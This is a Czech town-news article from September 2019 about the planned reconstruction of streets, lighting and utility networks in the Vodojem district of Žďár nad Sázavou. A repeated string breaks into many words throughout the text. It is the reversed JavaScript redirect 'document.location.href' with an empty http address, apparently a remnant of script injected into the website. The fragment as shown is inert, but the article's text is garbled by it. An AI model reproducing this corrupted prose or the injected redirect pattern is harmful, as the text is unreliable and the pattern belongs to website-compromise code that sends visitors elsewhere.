Rainbow page separator

Stavební práce v další části čtvrti Vodojem začnou v listopadu

Pondělí, 16. září 2019

Veřejné osvětlení

Žďár nad Sázavou / Až do září 2022 je rozplánována rekonstrukce zbývající části čtvrti Vodojem. Nadcházející v pořadí třetí a současně i nejrozsáhlejší a finančně nejnáročnější etapa stavebních prací v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lokalitě začne přípravnými činnostmi le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu. Výsledkem budou nové chodníky, veřejné osvětlení, povrchy silnic, parkovišť i obslužných komunikací a kompletně zrekonstruované inženýrské sítě. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to souvislosti rovněž usiluje o získání dotační podpory.
Rekonstrukce ulic okrajové části Žďáru nad Sázavou, která byla vybudována v sedmdesátých letech minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí, začala již v roce 2017. Během následujících let byly zmodernizovány ulice Kavánova, Mánesova a Alšova. Opravy zbývajících ulic ve čtvrti Vodojem byly následně sloučeny do jedné zakázky rozložené do tří let.